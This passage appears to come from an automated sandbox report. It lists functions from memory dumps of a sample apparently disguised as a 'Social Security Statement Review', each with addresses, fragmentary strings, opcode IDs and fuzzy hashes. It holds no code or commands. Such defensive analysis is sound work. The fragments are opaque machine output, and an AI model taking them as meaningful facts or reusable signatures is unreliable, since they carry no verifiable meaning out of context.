                                                  • Opcode Fuzzy Hash: f413b816745be071e1d7968b2b15e6d2c9d006fdff61fe45f0fe451a6e3487d2
                                                  • Instruction Fuzzy Hash: 1651F471A0868C9FDB44EFA8D4557EDBBF1FF89350F0405BAD48DDB252CA24A882C781
                                                  Function 00007FF887F32CA6 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `'!g$KXg
                                                  • API String ID: 0-2774727907
                                                  • Opcode ID: 58b9b9971b8af51b12394f1e1e057340be2b520af539946c419c2c2d31bab781
                                                  • Instruction ID: 43688a801046000ee00af45869c40284db0f87e64f8c232e9b0ea021bd72baf2
                                                  • Opcode Fuzzy Hash: 58b9b9971b8af51b12394f1e1e057340be2b520af539946c419c2c2d31bab781
                                                  • Instruction Fuzzy Hash: E941C13164CA8A4FE795EB6884546797BF1FF59340F1804BAD08DCB1A3CE29AC82C700
                                                  Function 00007FF887CA330E Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: bL$H
                                                  • API String ID: 0-1394303329
                                                  • Opcode ID: f42abbfdf225e76e474ea707432608789e676aae3f24b0da1ac6169dcd8c6313
                                                  • Instruction ID: 9db6b932353191fe3952f00078365655ebe35e8e166bead8c4c544190547136f
                                                  • Opcode Fuzzy Hash: f42abbfdf225e76e474ea707432608789e676aae3f24b0da1ac6169dcd8c6313
                                                  • Instruction Fuzzy Hash: D9411A72F4EE5A4FE7A5966CA5612BDF3E2FF94791B48017AD40EC3182DD08AC168381
                                                  Function 00007FF887BDB561 Relevance: 2.6, Strings: 2, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PhOg$XjOg
                                                  • API String ID: 0-3949499370
                                                  • Opcode ID: ee7c9e5255ea4be8bdca744896e566d1b96a3e77232058f5566304b3eb9deb33
                                                  • Instruction ID: 94edc761a02f164a4ce0a13f3f3fde0a5d700b4e7dbdfaf0a295125d8eb27daa
                                                  • Opcode Fuzzy Hash: ee7c9e5255ea4be8bdca744896e566d1b96a3e77232058f5566304b3eb9deb33
                                                  • Instruction Fuzzy Hash: B6419A3194E6C98FD70B9B7888251AA7FB1EF57358B0A05FBC489CB0A3E9185856C352
                                                  Function 00007FF887F22555 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8!g$(8!g
                                                  • API String ID: 0-1780320298
                                                  • Opcode ID: 6a4cebf3295425fded507f45cbee87a11274122e898e798f2dccfb448c9b91c2
                                                  • Instruction ID: f0b73da69b1f4158b0fbfe60b0021cb031e3e9d3c9c8dee3efcfbfcbf26eccfb
                                                  • Opcode Fuzzy Hash: 6a4cebf3295425fded507f45cbee87a11274122e898e798f2dccfb448c9b91c2
                                                  • Instruction Fuzzy Hash: A0312170A28A4D8FDB94EB28C895BA977F2FF59344F5501E8D44DDB291CA35EC81CB40
                                                  Function 00007FF887F225F9 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8!g$(8!g
                                                  • API String ID: 0-1780320298
                                                  • Opcode ID: 4608d993b869f5db7a88455b41656dea8ca08d0fa173e8843b9abd743f4cab6c
                                                  • Instruction ID: d2cd47c50a6d9e14c2a6fd05ab7f4c43b42bf2751d1f85f5e25ba86b92c15ad4
                                                  • Opcode Fuzzy Hash: 4608d993b869f5db7a88455b41656dea8ca08d0fa173e8843b9abd743f4cab6c
                                                  • Instruction Fuzzy Hash: B9214470A28A4D8FDB94DB6CC895BA97BF1FF58344F5501E8D44DDB292CA35AC81CB00
                                                  Function 00007FF887BD8ED4 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XjOg$XjOg
                                                  • API String ID: 0-311768719
                                                  • Opcode ID: 07f9f38e5267c0cf74f326d18e158bca7e2ccade75e7565ed15848a10fceb7e8
                                                  • Instruction ID: 99f011ac1d870a77972bfb34cc7dc8a4fba740b16258bab582d1cd032525c332
                                                  • Opcode Fuzzy Hash: 07f9f38e5267c0cf74f326d18e158bca7e2ccade75e7565ed15848a10fceb7e8
                                                  • Instruction Fuzzy Hash: F821A330E4E6998FEB95CB2C88D5AA93FE2EF45351F0840F5C459C7193D924D942C750
                                                  Function 00007FF887BD4D99 Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XjOg$hiOg
                                                  • API String ID: 0-3774378103
                                                  • Opcode ID: 05d6df0f0e69982b0045aae16447129a394317730bc3c89f8f0d29558a3bf456
                                                  • Instruction ID: 41a940a4466c4b86abd33e3623d028f1e774dff3695aea3031ec8b2e4d9831ce
                                                  • Opcode Fuzzy Hash: 05d6df0f0e69982b0045aae16447129a394317730bc3c89f8f0d29558a3bf456
                                                  • Instruction Fuzzy Hash: C8218E3160DBC55FC3479B288865A957FB1EF97310B0A01EBC485CB1E3DA289849C792
                                                  Function 00007FF887BD8E41 Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XjOg$XjOg
                                                  • API String ID: 0-311768719
                                                  • Opcode ID: 9cac5739d5b944ae456dcdc22559b4d5336902cb431cb0c395c74fed30f7668d
                                                  • Instruction ID: 085f56bbe55bcccb213267599666916f6bd90118a7ff55ce8be712becfc79acc
                                                  • Opcode Fuzzy Hash: 9cac5739d5b944ae456dcdc22559b4d5336902cb431cb0c395c74fed30f7668d
                                                  • Instruction Fuzzy Hash: AE219231A4E6898FDB5ADB54C8E0AFC7BB3FF55351F0804F9C44A8B293DA64A841CB01
                                                  Function 00007FF887BDCBE4 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XjOg$XjOg
                                                  • API String ID: 0-311768719
                                                  • Opcode ID: cae34fe572c4ecd1c6fe9b129ae6ce7f55a740fb755792114d4616d9548ce4e4
                                                  • Instruction ID: 2c1221d7bf66f003a30de348d20053ced0f0232c311869f716d1060a6fcf27b1
                                                  • Opcode Fuzzy Hash: cae34fe572c4ecd1c6fe9b129ae6ce7f55a740fb755792114d4616d9548ce4e4
                                                  • Instruction Fuzzy Hash: 1D118231A0C5864FD74ACB288460AB83BD3FF8A390F2944BDD48ECB1D3D92A9C52D645
                                                  Function 00007FF887BDB739 Relevance: 2.5, Strings: 2, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XjOg$XjOg
                                                  • API String ID: 0-311768719
                                                  • Opcode ID: 8fc662fbc569284241f4b5a0a39de00e71083a7b60fe1cc845728f8c4b56c90d
                                                  • Instruction ID: ad65d6ca4f03f28b1ec72487271a1c6f7c1b9b39e68c6162c341d1e5a25b15d5
                                                  • Opcode Fuzzy Hash: 8fc662fbc569284241f4b5a0a39de00e71083a7b60fe1cc845728f8c4b56c90d
                                                  • Instruction Fuzzy Hash: 2301B521A8E6C50FE347837C18A26AE2FB3AF86354B4D04FAC048CF1D7D80C9846C355
                                                  Function 00007FF887BDAAB2 Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PhOg$XjOg
                                                  • API String ID: 0-3949499370
                                                  • Opcode ID: 6b089e6face7213fa29aea8a4b19ae979eb576d5a945dcbb30c5991c6b82859c
                                                  • Instruction ID: 81c5f2bbddb91d4c88f2136cea768f829a702b58ff06b6e08939cf367be46b17
                                                  • Opcode Fuzzy Hash: 6b089e6face7213fa29aea8a4b19ae979eb576d5a945dcbb30c5991c6b82859c
                                                  • Instruction Fuzzy Hash: 6D01D631A4D5815FE30597A884553FC7FA2BF86320F0803FAD0898B2D3C82C6C86D381
                                                  Function 00007FF887F31AF6 Relevance: 2.1, Strings: 1, Instructions: 839COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `:!g
                                                  • API String ID: 0-1826072897
                                                  • Opcode ID: 3fd1c2fd8bb6cffe9417aa5626386aa0ad935d0d8ffa0c62158905dabcc9320d
                                                  • Instruction ID: 41902a0930a28a9f47ee72bce10146d2822a6ebbf2052189f1e3d31686e47ab4
                                                  • Opcode Fuzzy Hash: 3fd1c2fd8bb6cffe9417aa5626386aa0ad935d0d8ffa0c62158905dabcc9320d
                                                  • Instruction Fuzzy Hash: 6942B130A5CA598FEBA8EB2998557AD77F1FF59340F1041B9D04DC7292DE34AC82CB81
                                                  Function 00007FF887F29511 Relevance: 1.9, Strings: 1, Instructions: 619COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: d7c7d249158d39be340cb220d0bf24fedc75081a7a57c7a4abb05958dcf7148a
                                                  • Instruction ID: bf6b5146eb0846cb3b78897ea05d67f3cd4bf970a295326c01c618627de447c2
                                                  • Opcode Fuzzy Hash: d7c7d249158d39be340cb220d0bf24fedc75081a7a57c7a4abb05958dcf7148a
                                                  • Instruction Fuzzy Hash: 8B02E230A6CA068FD748DF18E49567977E1FFA9350B1441BED44DCB297DE28E842CB81
                                                  Function 00007FF887F31B39 Relevance: 1.8, Strings: 1, Instructions: 527COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `:!g
                                                  • API String ID: 0-1826072897
                                                  • Opcode ID: be0157b15b1ca99f13d8f867eac1372622ae35a56a2dc6bbc7c4693247c11d0f
                                                  • Instruction ID: a18e3a76396271742d5c2b3c90de8249c8dd95caaa20688a52e6f389457bf9b4
                                                  • Opcode Fuzzy Hash: be0157b15b1ca99f13d8f867eac1372622ae35a56a2dc6bbc7c4693247c11d0f
                                                  • Instruction Fuzzy Hash: FD02A030A5CA598FDBA8EB2998557AD77F2FF59340F0401B9D04DC7296DE34AC81CB81
                                                  Function 00007FF887F2A520 Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: _H
                                                  • API String ID: 0-1446432687
                                                  • Opcode ID: 61a6118f7de08c0351f40050f0d9e2ecbf7efe2d0a8d8f6016276fae5cb62c29
                                                  • Instruction ID: 9e3cf0b5c19d69fdf6bdae269317ec76551de4d8ffaca586baa83eb216a62d88
                                                  • Opcode Fuzzy Hash: 61a6118f7de08c0351f40050f0d9e2ecbf7efe2d0a8d8f6016276fae5cb62c29
                                                  • Instruction Fuzzy Hash: F5A1373191DA894FE755EB79A8952FD3BF1FF46354B0801BAD88CCB1A3ED186806C342
                                                  Function 00007FF887F23B91 Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: wOg
                                                  • API String ID: 0-3738622098
                                                  • Opcode ID: ecf7d683d1783492f6a6f0e2ee2e7636e650ddfa8b8b21103667c1018987be7b
                                                  • Instruction ID: 6014e9d0182be214a9a8e8edd03677d735241b83a8706ceddd001c80e94a8789
                                                  • Opcode Fuzzy Hash: ecf7d683d1783492f6a6f0e2ee2e7636e650ddfa8b8b21103667c1018987be7b
                                                  • Instruction Fuzzy Hash: A3A1013065CA898FE742DB29D8656B97BF0FF56350F1901FAD489CB1E3DA68AC02C741
                                                  Function 00007FF887F33CB0 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($!g
                                                  • API String ID: 0-617568233
                                                  • Opcode ID: ddf090f32d7e14102f22d335ecc5a5a7de8b8f0fb76879ff32db7e6d0a983224
                                                  • Instruction ID: 7fc05cbbe3658b42f4f67c5473b40c509c775bfacc66d747cb047f5117ffad9b
                                                  • Opcode Fuzzy Hash: ddf090f32d7e14102f22d335ecc5a5a7de8b8f0fb76879ff32db7e6d0a983224
                                                  • Instruction Fuzzy Hash: 09912871A4DA8A4FE7A5D72C94556B87BF1FF5A740F0801BED04DCB293DA186C46C382
                                                  Function 00007FF887CA3563 Relevance: 1.5, Strings: 1, Instructions: 295COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: bL
                                                  • API String ID: 0-4033711590
                                                  • Opcode ID: 27e21f69ac380d61b84444637ed43911b026861e883828f72243cef8f13ff7bf
                                                  • Instruction ID: 481f194ad1950ac609dc839b6bbeced53dd462c6904ce2d48e963b098cb07a6d
                                                  • Opcode Fuzzy Hash: 27e21f69ac380d61b84444637ed43911b026861e883828f72243cef8f13ff7bf
                                                  • Instruction Fuzzy Hash: 73812472E4CA4D4FEB98EA2C98556BEB7E2FF95361B14017ED44DC3182EA18AC06C741
                                                  Function 00007FF887CA047B Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: bL
                                                  • API String ID: 0-4033711590
                                                  • Opcode ID: 4b61739fce8be21d1e940f25874e072ccf9abf62ee430c87257d8c6b60d54c2c
                                                  • Instruction ID: 4c521a140d11920381f645917005891e886e78f96c5a92eeb1a5df3796669cd3
                                                  • Opcode Fuzzy Hash: 4b61739fce8be21d1e940f25874e072ccf9abf62ee430c87257d8c6b60d54c2c
                                                  • Instruction Fuzzy Hash: F6711771E4CE8D5FEB95AA6898546FDBBE2FF98395F04017AD41CC3182EE189885C341
                                                  Function 00007FF887F370C8 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0 _H
                                                  • API String ID: 0-2886134116
                                                  • Opcode ID: 045ff1ae42f3bd2685fdd223ae56328f6f2ef3543de5cc8cfa3b981a9997404e
                                                  • Instruction ID: b5f17880d2e1db4da1a744bac398ca548dbcc92e3ac60de35e995d96249d06e6
                                                  • Opcode Fuzzy Hash: 045ff1ae42f3bd2685fdd223ae56328f6f2ef3543de5cc8cfa3b981a9997404e
                                                  • Instruction Fuzzy Hash: AD717931A4CB864FE3A5E7399485679BBF0FF553A4F0C04BED449CB1A2DA2CA842C711
                                                  Function 00007FF887BE004D Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ppOg
                                                  • API String ID: 0-3132993761
                                                  • Opcode ID: b1c5bfb4976d5a58a0c0f16b46eb3718ce0997182fcf3529c054ee3fcc4a5b8e
                                                  • Instruction ID: 7328dde4209c76203670dff746fd0afad757231e23adcf4b3f06d56d686b91c2
                                                  • Opcode Fuzzy Hash: b1c5bfb4976d5a58a0c0f16b46eb3718ce0997182fcf3529c054ee3fcc4a5b8e
                                                  • Instruction Fuzzy Hash: 4971C631A58A5D8FDBA4EF68C855BEDB7B1FF58341F5000AAD00DE7291CB38A880CB41
                                                  Function 00007FF887CA1754 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: bL
                                                  • API String ID: 0-4033711590
                                                  • Opcode ID: 5eab2866ea0414e7f2a1fcf606cf1a7fa40a1030443323b3230715d9d5d747fa
                                                  • Instruction ID: bba13048a00cbb5eca6aab45ff63d18bb691cf448e5ca143a4d14ad8a78f1a69
                                                  • Opcode Fuzzy Hash: 5eab2866ea0414e7f2a1fcf606cf1a7fa40a1030443323b3230715d9d5d747fa
                                                  • Instruction Fuzzy Hash: 6D510462E5DE8A4FE7A59A6C94112BDB6F2FF457A2B5901BEC00DC71C3DE18AC05C342
                                                  Function 00007FF887F3606A Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XLXg
                                                  • API String ID: 0-4157189970
                                                  • Opcode ID: 02c4b037fa1c814c21feb60dbd6fe90d4d72087e86d26c9c085e67470ea68243
                                                  • Instruction ID: b6102e044c0f9dcab395742067b42856a6cb7d54bad6ec7e0ef1cedfb1f303e1
                                                  • Opcode Fuzzy Hash: 02c4b037fa1c814c21feb60dbd6fe90d4d72087e86d26c9c085e67470ea68243
                                                  • Instruction Fuzzy Hash: 9D511531A5CA4A4FD759EA2C98456B9B7F1FB8A750F1001BED08EC7293DE24BC538781
                                                  Function 00007FF887F32664 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: | _L
                                                  • API String ID: 0-2057947896
                                                  • Opcode ID: ff1c856fa58223a5711a5988811f2a792b4bd61d567c51cd60fb2136a3cb8bb9
                                                  • Instruction ID: 4a3f45f24d5f6bcab5e36bcf6e75197bc21460fcda614f6adfa6cba01420676d
                                                  • Opcode Fuzzy Hash: ff1c856fa58223a5711a5988811f2a792b4bd61d567c51cd60fb2136a3cb8bb9
                                                  • Instruction Fuzzy Hash: CD51B031A5894D8FDB99EF2CD8556AD3BF1FF69340F0501A9E40DC7296DA34AC41CB81
                                                  Function 00007FF887F301E0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `"!g
                                                  • API String ID: 0-2128763785
                                                  • Opcode ID: 9858013aff75e29f1645b6e753086c03deaad1a76599c3960d93d00c877f54dd
                                                  • Instruction ID: 8da468b50fd72672895ee1aa6802cf8d5904cc0a8e88f1c470bf96cc1170cf2f
                                                  • Opcode Fuzzy Hash: 9858013aff75e29f1645b6e753086c03deaad1a76599c3960d93d00c877f54dd
                                                  • Instruction Fuzzy Hash: 67515A7155DB864FD765DB688406AAD7BF1FF46340F0404FEC4DECB1A2DA28A80AC382
                                                  Function 00007FF887CA0AE4 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: bL
                                                  • API String ID: 0-4033711590
                                                  • Opcode ID: 6c6df11eefae9a098c5e80023ce67ffcd7de042b9525f91a3adbcac6de3ccc3d
                                                  • Instruction ID: bd9203ef511c5f4c44adcbb78d650386c230754a28a8c9a5991f965af3ee336b
                                                  • Opcode Fuzzy Hash: 6c6df11eefae9a098c5e80023ce67ffcd7de042b9525f91a3adbcac6de3ccc3d
                                                  • Instruction Fuzzy Hash: 5D412732F4CF494FE7A5966CB5113B9B7E2FF846A6B4801BFC41DC3186ED189841C281
                                                  Function 00007FF887CA43E1 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: bL
                                                  • API String ID: 0-4033711590
                                                  • Opcode ID: ff517de1cdf6b823d5538d612934a7ad938349a74e26dd1aed513d04729ad9a3
                                                  • Instruction ID: d9a5eb08967ab073dc4b323ec4b933998e1560358b31c13a314ba262a5c7b3e4
                                                  • Opcode Fuzzy Hash: ff517de1cdf6b823d5538d612934a7ad938349a74e26dd1aed513d04729ad9a3
                                                  • Instruction Fuzzy Hash: 5D312672E0CA994FEBA5D61CA4206B8B7F2FF85751B4841BBC14EC3183DA18AD108781
                                                  Function 00007FF887CA2D96 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-2852464175
                                                  • Opcode ID: a83367fa272833cb043b325a84d9cf2f8c78904fa7099f6ff2eac683e0a76e69
                                                  • Instruction ID: 9af437f21f91cdd849f8d74f797b6d918a138ae5b4c6f900dfbf69a18ea74e13
                                                  • Opcode Fuzzy Hash: a83367fa272833cb043b325a84d9cf2f8c78904fa7099f6ff2eac683e0a76e69
                                                  • Instruction Fuzzy Hash: 0F31B752D8DA964FF7A996689555ABCA6E2FFA5392B5800BDD40DC31D3DE0C9CC0C301
                                                  Function 00007FF887F243E4 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: wOg
                                                  • API String ID: 0-3738622098
